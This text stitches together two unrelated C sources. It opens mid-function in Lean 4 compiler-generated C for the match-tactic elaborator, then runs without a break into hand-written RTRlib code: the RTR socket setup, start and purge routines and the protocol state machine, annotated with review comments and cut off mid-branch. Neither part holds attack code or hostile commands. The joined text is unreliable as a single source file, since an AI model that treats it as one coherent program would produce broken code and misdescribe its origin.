l_Lean_replaceRef(x_1, x_19); lean_dec(x_19); x_25 = lean_alloc_ctor(0, 8, 0); lean_ctor_set(x_25, 0, x_16); lean_ctor_set(x_25, 1, x_17); lean_ctor_set(x_25, 2, x_18); lean_ctor_set(x_25, 3, x_24); lean_ctor_set(x_25, 4, x_20); lean_ctor_set(x_25, 5, x_21); lean_ctor_set(x_25, 6, x_22); lean_ctor_set(x_25, 7, x_23); x_26 = l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_25, x_10, x_11); lean_dec(x_25); return x_26; } } } lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___rarg(lean_object* x_1) { _start: { lean_object* x_2; lean_object* x_3; x_2 = l_Lean_Elab_throwUnsupportedSyntax___rarg___closed__1; x_3 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_3, 0, x_2); lean_ctor_set(x_3, 1, x_1); return x_3; } } lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8) { _start: { lean_object* x_9; x_9 = lean_alloc_closure((void*)(l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___rarg), 1, 0); return x_9; } } lean_object* l_Lean_Elab_Tactic_evalMatch(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; x_11 = l_Lean_Elab_Tactic_getMainTag(x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10); if (lean_obj_tag(x_11) == 0) { lean_object* x_12; lean_object* x_13; lean_object* x_14; lean_object* x_15; lean_object* x_40; lean_object* x_41; lean_object* x_42; lean_object* x_43; lean_object* x_44; lean_object* x_45; lean_object* x_46; lean_object* x_47; lean_object* x_48; lean_object* x_49; lean_object* x_50; lean_object* x_51; lean_object* x_52; lean_object* x_53; lean_object* x_54; lean_object* x_55; lean_object* x_56; lean_object* x_57; 
lean_object* x_58; x_12 = lean_ctor_get(x_11, 0); lean_inc(x_12); x_13 = lean_ctor_get(x_11, 1); lean_inc(x_13); lean_dec(x_11); x_40 = lean_st_ref_get(x_9, x_13); x_41 = lean_ctor_get(x_40, 0); lean_inc(x_41); x_42 = lean_ctor_get(x_40, 1); lean_inc(x_42); lean_dec(x_40); x_43 = lean_ctor_get(x_41, 0); lean_inc(x_43); lean_dec(x_41); x_44 = lean_ctor_get(x_8, 3); lean_inc(x_44); x_45 = l_Lean_Elab_Term_getCurrMacroScope(x_4, x_5, x_6, x_7, x_8, x_9, x_42); x_46 = lean_ctor_get(x_45, 0); lean_inc(x_46); x_47 = lean_ctor_get(x_45, 1); lean_inc(x_47); lean_dec(x_45); x_48 = lean_ctor_get(x_8, 1); lean_inc(x_48); x_49 = lean_ctor_get(x_8, 2); lean_inc(x_49); x_50 = lean_st_ref_get(x_9, x_47); x_51 = lean_ctor_get(x_50, 0); lean_inc(x_51); x_52 = lean_ctor_get(x_50, 1); lean_inc(x_52); lean_dec(x_50); x_53 = lean_ctor_get(x_51, 1); lean_inc(x_53); lean_dec(x_51); lean_inc(x_43); x_54 = lean_alloc_closure((void*)(l___private_Lean_Elab_Util_0__Lean_Elab_expandMacro_x3f___boxed), 4, 1); lean_closure_set(x_54, 0, x_43); x_55 = x_54; x_56 = lean_environment_main_module(x_43); x_57 = lean_alloc_ctor(0, 6, 0); lean_ctor_set(x_57, 0, x_55); lean_ctor_set(x_57, 1, x_56); lean_ctor_set(x_57, 2, x_46); lean_ctor_set(x_57, 3, x_48); lean_ctor_set(x_57, 4, x_49); lean_ctor_set(x_57, 5, x_44); lean_inc(x_1); x_58 = l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm(x_12, x_1, x_57, x_53); if (lean_obj_tag(x_58) == 0) { lean_object* x_59; lean_object* x_60; lean_object* x_61; lean_object* x_62; lean_object* x_63; uint8_t x_64; x_59 = lean_ctor_get(x_58, 0); lean_inc(x_59); x_60 = lean_ctor_get(x_58, 1); lean_inc(x_60); lean_dec(x_58); x_61 = lean_st_ref_take(x_9, x_52); x_62 = lean_ctor_get(x_61, 0); lean_inc(x_62); x_63 = lean_ctor_get(x_61, 1); lean_inc(x_63); lean_dec(x_61); x_64 = !lean_is_exclusive(x_62); if (x_64 == 0) { lean_object* x_65; lean_object* x_66; lean_object* x_67; x_65 = lean_ctor_get(x_62, 1); lean_dec(x_65); lean_ctor_set(x_62, 1, x_60); 
x_66 = lean_st_ref_set(x_9, x_62, x_63); x_67 = lean_ctor_get(x_66, 1); lean_inc(x_67); lean_dec(x_66); x_14 = x_59; x_15 = x_67; goto block_39; } else { lean_object* x_68; lean_object* x_69; lean_object* x_70; lean_object* x_71; lean_object* x_72; lean_object* x_73; x_68 = lean_ctor_get(x_62, 0); x_69 = lean_ctor_get(x_62, 2); x_70 = lean_ctor_get(x_62, 3); lean_inc(x_70); lean_inc(x_69); lean_inc(x_68); lean_dec(x_62); x_71 = lean_alloc_ctor(0, 4, 0); lean_ctor_set(x_71, 0, x_68); lean_ctor_set(x_71, 1, x_60); lean_ctor_set(x_71, 2, x_69); lean_ctor_set(x_71, 3, x_70); x_72 = lean_st_ref_set(x_9, x_71, x_63); x_73 = lean_ctor_get(x_72, 1); lean_inc(x_73); lean_dec(x_72); x_14 = x_59; x_15 = x_73; goto block_39; } } else { lean_object* x_74; lean_dec(x_1); x_74 = lean_ctor_get(x_58, 0); lean_inc(x_74); lean_dec(x_58); if (lean_obj_tag(x_74) == 0) { lean_object* x_75; lean_object* x_76; lean_object* x_77; lean_object* x_78; lean_object* x_79; uint8_t x_80; x_75 = lean_ctor_get(x_74, 0); lean_inc(x_75); x_76 = lean_ctor_get(x_74, 1); lean_inc(x_76); lean_dec(x_74); x_77 = lean_alloc_ctor(2, 1, 0); lean_ctor_set(x_77, 0, x_76); x_78 = lean_alloc_ctor(0, 1, 0); lean_ctor_set(x_78, 0, x_77); x_79 = l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1(x_75, x_78, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_52); lean_dec(x_9); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); lean_dec(x_75); x_80 = !lean_is_exclusive(x_79); if (x_80 == 0) { return x_79; } else { lean_object* x_81; lean_object* x_82; lean_object* x_83; x_81 = lean_ctor_get(x_79, 0); x_82 = lean_ctor_get(x_79, 1); lean_inc(x_82); lean_inc(x_81); lean_dec(x_79); x_83 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_83, 0, x_81); lean_ctor_set(x_83, 1, x_82); return x_83; } } else { lean_object* x_84; uint8_t x_85; lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); x_84 = 
l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___rarg(x_52); x_85 = !lean_is_exclusive(x_84); if (x_85 == 0) { return x_84; } else { lean_object* x_86; lean_object* x_87; lean_object* x_88; x_86 = lean_ctor_get(x_84, 0); x_87 = lean_ctor_get(x_84, 1); lean_inc(x_87); lean_inc(x_86); lean_dec(x_84); x_88 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_88, 0, x_86); lean_ctor_set(x_88, 1, x_87); return x_88; } } } block_39: { lean_object* x_16; lean_object* x_17; lean_object* x_18; lean_object* x_19; lean_object* x_20; lean_object* x_21; lean_object* x_22; lean_object* x_23; lean_object* x_24; lean_object* x_25; lean_object* x_26; lean_object* x_27; lean_object* x_28; lean_object* x_29; lean_object* x_30; lean_object* x_31; lean_object* x_32; lean_object* x_33; lean_object* x_34; lean_object* x_35; lean_object* x_36; lean_object* x_37; lean_object* x_38; x_16 = lean_ctor_get(x_14, 0); lean_inc(x_16); x_17 = lean_ctor_get(x_14, 1); lean_inc(x_17); lean_dec(x_14); x_18 = l_Lean_MonadRef_mkInfoFromRefPos___at_Lean_Elab_Tactic_evalIntro___spec__1___rarg(x_8, x_9, x_15); x_19 = lean_ctor_get(x_18, 0); lean_inc(x_19); x_20 = lean_ctor_get(x_18, 1); lean_inc(x_20); lean_dec(x_18); x_21 = l_Lean_Elab_Term_getCurrMacroScope(x_4, x_5, x_6, x_7, x_8, x_9, x_20); x_22 = lean_ctor_get(x_21, 1); lean_inc(x_22); lean_dec(x_21); x_23 = l_Lean_Elab_Term_getMainModule___rarg(x_9, x_22); x_24 = lean_ctor_get(x_23, 1); lean_inc(x_24); lean_dec(x_23); x_25 = l_Lean_Parser_Tactic_refine___closed__1; x_26 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_26, 0, x_19); lean_ctor_set(x_26, 1, x_25); x_27 = l_Array_empty___closed__1; x_28 = lean_array_push(x_27, x_26); x_29 = lean_array_push(x_28, x_16); x_30 = l_Lean_Parser_Tactic_refine___closed__2; x_31 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_31, 0, x_30); lean_ctor_set(x_31, 1, x_29); x_32 = l_Lean_mkOptionalNode___closed__2; x_33 = lean_array_push(x_32, x_31); x_34 = l_Array_append___rarg(x_33, x_17); 
lean_dec(x_17); x_35 = l_Lean_nullKind; x_36 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_36, 0, x_35); lean_ctor_set(x_36, 1, x_34); lean_inc(x_36); lean_inc(x_1); x_37 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_adaptExpander___lambda__1), 11, 2); lean_closure_set(x_37, 0, x_1); lean_closure_set(x_37, 1, x_36); x_38 = l_Lean_Elab_withMacroExpansionInfo___at_Lean_Elab_Tactic_adaptExpander___spec__1(x_1, x_36, x_37, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_24); return x_38; } } else { uint8_t x_89; lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); lean_dec(x_1); x_89 = !lean_is_exclusive(x_11); if (x_89 == 0) { return x_11; } else { lean_object* x_90; lean_object* x_91; lean_object* x_92; x_90 = lean_ctor_get(x_11, 0); x_91 = lean_ctor_get(x_11, 1); lean_inc(x_91); lean_inc(x_90); lean_dec(x_11); x_92 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_92, 0, x_90); lean_ctor_set(x_92, 1, x_91); return x_92; } } } } lean_object* l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; x_11 = l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); return x_11; } } lean_object* l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10, lean_object* x_11) { _start: { lean_object* x_12; x_12 = l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10, x_11); 
lean_dec(x_10); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_1); return x_12; } } lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8) { _start: { lean_object* x_9; x_9 = l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); lean_dec(x_1); return x_9; } } static lean_object* _init_l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1() { _start: { lean_object* x_1; x_1 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalMatch), 10, 0); return x_1; } } lean_object* l___regBuiltin_Lean_Elab_Tactic_evalMatch(lean_object* x_1) { _start: { lean_object* x_2; lean_object* x_3; lean_object* x_4; lean_object* x_5; x_2 = l_Lean_Elab_Tactic_tacticElabAttribute; x_3 = l_Lean_Parser_Tactic_match___elambda__1___closed__1; x_4 = l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1; x_5 = l_Lean_KeyedDeclsAttribute_addBuiltin___rarg(x_2, x_3, x_4, x_1); return x_5; } } lean_object* initialize_Init(lean_object*); lean_object* initialize_Lean_Parser_Term(lean_object*); lean_object* initialize_Lean_Elab_Match(lean_object*); lean_object* initialize_Lean_Elab_Tactic_Basic(lean_object*); lean_object* initialize_Lean_Elab_Tactic_Induction(lean_object*); static bool _G_initialized = false; lean_object* initialize_Lean_Elab_Tactic_Match(lean_object* w) { lean_object * res; if (_G_initialized) return lean_io_result_mk_ok(lean_box(0)); _G_initialized = true; res = initialize_Init(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); res = initialize_Lean_Parser_Term(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); 
res = initialize_Lean_Elab_Match(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); res = initialize_Lean_Elab_Tactic_Basic(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); res = initialize_Lean_Elab_Tactic_Induction(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1 = _init_l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1(); lean_mark_persistent(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1); l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2 = _init_l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2(); lean_mark_persistent(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2); l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1 = _init_l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1(); lean_mark_persistent(l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1); res = l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default = _init_l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default(); lean_mark_persistent(l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default); l_Lean_Elab_Tactic_AuxMatchTermState_cases___default = _init_l_Lean_Elab_Tactic_AuxMatchTermState_cases___default(); lean_mark_persistent(l_Lean_Elab_Tactic_AuxMatchTermState_cases___default); l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1 = _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1(); lean_mark_persistent(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1); 
l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2 = _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2(); lean_mark_persistent(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2); l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3 = _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3(); lean_mark_persistent(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3); l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4 = _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4(); lean_mark_persistent(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4); l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1 = _init_l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1(); lean_mark_persistent(l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1); l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1 = _init_l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1(); lean_mark_persistent(l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1); l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1 = _init_l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1(); 
lean_mark_persistent(l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1); res = l___regBuiltin_Lean_Elab_Tactic_evalMatch(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); return lean_io_result_mk_ok(lean_box(0)); } #ifdef __cplusplus } #endif
/*
 * This file is part of RTRlib.
 *
 * This file is subject to the terms and conditions of the MIT license.
 * See the file LICENSE in the top level directory for more details.
 *
 * Website: http://rtrlib.realmv6.org/
 */

#include "rtr_private.h"
#include "rtrlib/lib/log_private.h"
#include "rtrlib/lib/utils_private.h"
#include "rtrlib/pfx/pfx_private.h"
#include "rtrlib/rtr/packets_private.h"
#include "rtrlib/rtrlib_export_private.h"
#include "rtrlib/spki/hashtable/ht-spkitable_private.h"
#include "rtrlib/transport/transport_private.h"

#include <assert.h>
#include <pthread.h>
#include <signal.h>
#include <unistd.h>

/* Forward declarations for the two internals used by rtr_start()/the FSM. */
static void rtr_purge_outdated_records(struct rtr_socket *rtr_socket);
static void *rtr_fsm_start(struct rtr_socket *rtr_socket);

/*
 * Human-readable names for the socket states, indexed by enum value via
 * designated initializers. Used by rtr_state_to_str().
 * NOTE(review): RTR_CLOSED (assigned in rtr_init) has no entry here --
 * if its enum value is not covered by the initializers below,
 * rtr_state_to_str(RTR_CLOSED) returns NULL; confirm against the enum
 * definition in the header.
 */
static const char *socket_str_states[] = {[RTR_CONNECTING] = "RTR_CONNECTING",
					  [RTR_ESTABLISHED] = "RTR_ESTABLISHED",
					  [RTR_RESET] = "RTR_RESET",
					  [RTR_SYNC] = "RTR_SYNC",
					  [RTR_FAST_RECONNECT] = "RTR_FAST_RECONNECT",
					  [RTR_ERROR_NO_DATA_AVAIL] = "RTR_ERROR_NO_DATA_AVAIL",
					  [RTR_ERROR_NO_INCR_UPDATE_AVAIL] = "RTR_ERROR_NO_INCR_UPDATE_AVAIL",
					  [RTR_ERROR_FATAL] = "RTR_ERROR_FATAL",
					  [RTR_ERROR_TRANSPORT] = "RTR_ERROR_TRANSPORT",
					  [RTR_SHUTDOWN] = "RTR_SHUTDOWN"};

/*
 * Initialize an rtr_socket before rtr_start() is called.
 *
 * @param rtr_socket       socket to initialize (fields are overwritten)
 * @param tr               transport socket; only assigned when non-NULL,
 *                         so a transport configured earlier is preserved
 * @param pfx_table        prefix table the socket feeds
 * @param spki_table       router-key table the socket feeds
 * @param refresh_interval validated against [RTR_REFRESH_MIN, RTR_REFRESH_MAX]
 * @param expire_interval  validated against [RTR_EXPIRATION_MIN, RTR_EXPIRATION_MAX]
 * @param retry_interval   validated against [RTR_RETRY_MIN, RTR_RETRY_MAX]
 * @param iv_mode          how server-announced intervals are treated
 * @param fp               connection-state callback (may observe state changes)
 * @param fp_param_config  opaque callback argument (config scope)
 * @param fp_param_group   opaque callback argument (group scope)
 * @return RTR_SUCCESS, or RTR_INVALID_PARAM if any interval is out of range
 */
int rtr_init(struct rtr_socket *rtr_socket, struct tr_socket *tr, struct pfx_table *pfx_table,
	     struct spki_table *spki_table, const unsigned int refresh_interval,
	     const unsigned int expire_interval, const unsigned int retry_interval,
	     enum rtr_interval_mode iv_mode, rtr_connection_state_fp fp, void *fp_param_config, void *fp_param_group)
{
	if (tr)
		rtr_socket->tr_socket = tr;

	// Check if one of the intervals is not in range of the predefined values.
	if (rtr_check_interval_range(refresh_interval, RTR_REFRESH_MIN, RTR_REFRESH_MAX) != RTR_INSIDE_INTERVAL_RANGE ||
	    rtr_check_interval_range(expire_interval, RTR_EXPIRATION_MIN, RTR_EXPIRATION_MAX) !=
		    RTR_INSIDE_INTERVAL_RANGE ||
	    rtr_check_interval_range(retry_interval, RTR_RETRY_MIN, RTR_RETRY_MAX) != RTR_INSIDE_INTERVAL_RANGE) {
		RTR_DBG("Interval value not in range.");
		return RTR_INVALID_PARAM;
	}

	rtr_socket->refresh_interval = refresh_interval;
	rtr_socket->expire_interval = expire_interval;
	rtr_socket->retry_interval = retry_interval;
	rtr_socket->iv_mode = iv_mode;
	rtr_socket->state = RTR_CLOSED;
	/* No session yet: the first connection must begin with a reset query. */
	rtr_socket->request_session_id = true;
	rtr_socket->serial_number = 0;
	rtr_socket->last_update = 0;
	rtr_socket->pfx_table = pfx_table;
	rtr_socket->spki_table = spki_table;
	rtr_socket->connection_state_fp = fp;
	rtr_socket->connection_state_fp_param_config = fp_param_config;
	rtr_socket->connection_state_fp_param_group = fp_param_group;
	/* thread_id == 0 doubles as the "not started" marker checked by rtr_start()/rtr_stop(). */
	rtr_socket->thread_id = 0;
	/* Start by offering the newest protocol version; negotiation may lower it elsewhere. */
	rtr_socket->version = RTR_PROTOCOL_MAX_SUPPORTED_VERSION;
	rtr_socket->has_received_pdus = false;
	rtr_socket->is_resetting = false;
	return RTR_SUCCESS;
}

/*
 * Spawn the FSM thread for an initialized socket.
 * Returns RTR_ERROR if a thread is already running (thread_id != 0) or
 * pthread_create fails; RTR_SUCCESS otherwise.
 */
int rtr_start(struct rtr_socket *rtr_socket)
{
	if (rtr_socket->thread_id)
		return RTR_ERROR;

	int rtval = pthread_create(&(rtr_socket->thread_id), NULL, (void *(*)(void *)) & rtr_fsm_start, rtr_socket);

	if (rtval == 0)
		return RTR_SUCCESS;
	return RTR_ERROR;
}

/*
 * Drop cached records when they are older than expire_interval.
 * A socket that never completed a sync (last_update == 0) has nothing to purge.
 * When the clock cannot be read (rtval == -1) we purge defensively rather
 * than risk serving stale data. After a purge the session is invalidated
 * (request_session_id = true, serial reset) so the FSM performs a full reset.
 */
void rtr_purge_outdated_records(struct rtr_socket *rtr_socket)
{
	if (rtr_socket->last_update == 0)
		return;

	time_t cur_time;
	int rtval = lrtr_get_monotonic_time(&cur_time);

	if (rtval == -1 || (rtr_socket->last_update + rtr_socket->expire_interval) < cur_time) {
		if (rtval == -1)
			/* message text has an upstream typo ("monotic"); left as-is, it is a runtime string */
			RTR_DBG1("get_monotic_time(..) failed");
		pfx_table_src_remove(rtr_socket->pfx_table, rtr_socket);
		RTR_DBG1("Removed outdated records from pfx_table");
		spki_table_src_remove(rtr_socket->spki_table, rtr_socket);
		RTR_DBG1("Removed outdated router keys from spki_table");
		rtr_socket->request_session_id = true;
		rtr_socket->serial_number = 0;
		rtr_socket->last_update = 0;
		rtr_socket->is_resetting = true;
	}
}

/* WARNING: This Function has cancelable sections*/
/*
 * Thread entry point: the RTR protocol finite-state machine.
 *
 * Runs forever, dispatching on rtr_socket->state each iteration, until the
 * state becomes RTR_SHUTDOWN (then pthread_exit). Cancellation is DISABLED
 * by default and enabled only around the blocking calls (rtr_wait_for_sync
 * and the retry sleep()s) so that rtr_stop()'s pthread_cancel() can only
 * land where no partially-updated state would be left behind.
 */
void *rtr_fsm_start(struct rtr_socket *rtr_socket)
{
	if (rtr_socket->state == RTR_SHUTDOWN)
		return NULL;

	// We don't care about the old state, but POSIX demands a non null value for setcancelstate
	int oldcancelstate;

	pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, &oldcancelstate);

	rtr_socket->state = RTR_CONNECTING;
	while (1) {
		if (rtr_socket->state == RTR_CONNECTING) {
			RTR_DBG1("State: RTR_CONNECTING");
			rtr_socket->has_received_pdus = false;

			// old pfx_record could exists in the pfx_table, check if they are too old and must be removed
			// old key_entry could exists in the spki_table, check if they are too old and must be removed
			rtr_purge_outdated_records(rtr_socket);

			if (tr_open(rtr_socket->tr_socket) == TR_ERROR) {
				rtr_change_socket_state(rtr_socket, RTR_ERROR_TRANSPORT);
			} else if (rtr_socket->request_session_id) {
				// change to state RESET, if socket doesn't have a session_id
				rtr_change_socket_state(rtr_socket, RTR_RESET);
			} else {
				// if we already have a session_id, send a serial query and start to sync
				if (rtr_send_serial_query(rtr_socket) == RTR_SUCCESS)
					rtr_change_socket_state(rtr_socket, RTR_SYNC);
				else
					rtr_change_socket_state(rtr_socket, RTR_ERROR_FATAL);
			}
		} else if (rtr_socket->state == RTR_RESET) {
			RTR_DBG1("State: RTR_RESET");
			if (rtr_send_reset_query(rtr_socket) == RTR_SUCCESS) {
				RTR_DBG1("rtr_start: reset pdu sent");
				// start to sync after connection is established
				rtr_change_socket_state(rtr_socket, RTR_SYNC);
			}
			/* on failure we fall through and re-dispatch on whatever
			 * state rtr_send_reset_query's error path set */
		} else if (rtr_socket->state == RTR_SYNC) {
			RTR_DBG1("State: RTR_SYNC");
			if (rtr_sync(rtr_socket) == RTR_SUCCESS)
				// wait for next sync after first successful sync
				rtr_change_socket_state(rtr_socket, RTR_ESTABLISHED);
		} else if (rtr_socket->state == RTR_ESTABLISHED) {
			RTR_DBG1("State: RTR_ESTABLISHED");

			// Allow thread cancellation for recv code path only.
			// This should be enough since we spend most of the time blocking on recv
			pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, &oldcancelstate);
			// blocks till expire_interval is expired or PDU was received
			int ret = rtr_wait_for_sync(rtr_socket);

			pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, &oldcancelstate);

			if (ret == RTR_SUCCESS) { // send serial query
				if (rtr_send_serial_query(rtr_socket) == RTR_SUCCESS)
					rtr_change_socket_state(rtr_socket, RTR_SYNC);
			}
		} else if (rtr_socket->state == RTR_FAST_RECONNECT) {
			RTR_DBG1("State: RTR_FAST_RECONNECT");
			/* Reconnect immediately, without the retry_interval pause. */
			tr_close(rtr_socket->tr_socket);
			rtr_change_socket_state(rtr_socket, RTR_CONNECTING);
		} else if (rtr_socket->state == RTR_ERROR_NO_DATA_AVAIL) {
			RTR_DBG1("State: RTR_ERROR_NO_DATA_AVAIL");
			/* Cache miss on the server: restart the session from scratch. */
			rtr_socket->request_session_id = true;
			rtr_socket->serial_number = 0;
			rtr_change_socket_state(rtr_socket, RTR_RESET);
			sleep(rtr_socket->retry_interval);
			rtr_purge_outdated_records(rtr_socket);
		} else if (rtr_socket->state == RTR_ERROR_NO_INCR_UPDATE_AVAIL) {
			RTR_DBG1("State: RTR_ERROR_NO_INCR_UPDATE_AVAIL");
			/* Server cannot serve our serial: fall back to a full reset (no delay). */
			rtr_socket->request_session_id = true;
			rtr_socket->serial_number = 0;
			rtr_change_socket_state(rtr_socket, RTR_RESET);
			rtr_purge_outdated_records(rtr_socket);
		} else if (rtr_socket->state == RTR_ERROR_TRANSPORT) {
			RTR_DBG1("State: RTR_ERROR_TRANSPORT");
			tr_close(rtr_socket->tr_socket);
			rtr_change_socket_state(rtr_socket, RTR_CONNECTING);
			RTR_DBG("Waiting %u", rtr_socket->retry_interval);
			/* Cancellation window: the retry sleep may take a long time. */
			pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, &oldcancelstate);
			sleep(rtr_socket->retry_interval);
			pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, &oldcancelstate);
		} else if (rtr_socket->state == RTR_ERROR_FATAL) {
			RTR_DBG1("State: RTR_ERROR_FATAL");
			tr_close(rtr_socket->tr_socket);
			rtr_change_socket_state(rtr_socket, RTR_CONNECTING);
			RTR_DBG("Waiting %u", rtr_socket->retry_interval);
